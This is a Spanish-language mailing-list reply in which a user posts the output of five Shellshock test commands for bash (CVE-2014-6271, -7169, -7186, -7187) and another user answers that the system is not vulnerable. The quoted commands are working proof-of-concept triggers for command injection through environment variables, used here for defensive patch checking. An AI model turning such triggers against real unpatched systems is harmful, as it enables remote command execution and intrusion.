[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Bash vulnerable

El domingo, 28 sep 2014 a las 18:55 horas (UTC+2),
Eduardo Rios escribió:

>El 28/09/14 a las 18:03, Fabián Bonetti escribió:
>
>> Esas no son las pruebas correctas.
>>
>> Las correctas están aquí > https://shellshocker.net/
>
>Vamos allá:
>
>Exploit 1 (CVE-2014-6271)
>
>edurios@debian:~$ env x='() { :;}; echo vulnerable' bash -c "echo this 
>is a test"
>this is a test
>edurios@debian:~$
>
>Exploit 2 (CVE-2014-7169)
>
>edurios@debian:~$ env X='() { (shellshocker.net)=>\' bash -c "echo 
>date"; cat echo ; rm -f echo
>date
>cat: echo: No existe el fichero o el directorio
>edurios@debian:~$
>
>Exploit 3 (???)
>
>edurios@debian:~$ env -i X=' () { }; echo hello' bash -c 'date'
>Sun Sep 28 18:50:44 CEST 2014
>edurios@debian:~$
>
>Exploit 4 (CVE-2014-7186)
>
>edurios@debian:~$ bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF 
><<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
> > echo "CVE-2014-7186 vulnerable, redir_stack"
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>bash: aviso: el documento-aquí en la línea 0 está delimitado por 
>fin-de-fichero (se esperaba `EOF')
>edurios@debian:~$
>
>
>Exploit 5 (CVE-2014-7187)
>edurios@debian:~$ (for x in {1..200} ; do echo "for x$x in ; do :"; 
>done; for x in {1..200} ; do echo done ; done) | bash ||
> > echo "CVE-2014-7187 vulnerable, word_lineno"
>edurios@debian:~$
>
>
>¿Es vulnerable a alguno de los 5 test?

No.

-- 
Manolo Díaz
Reply to: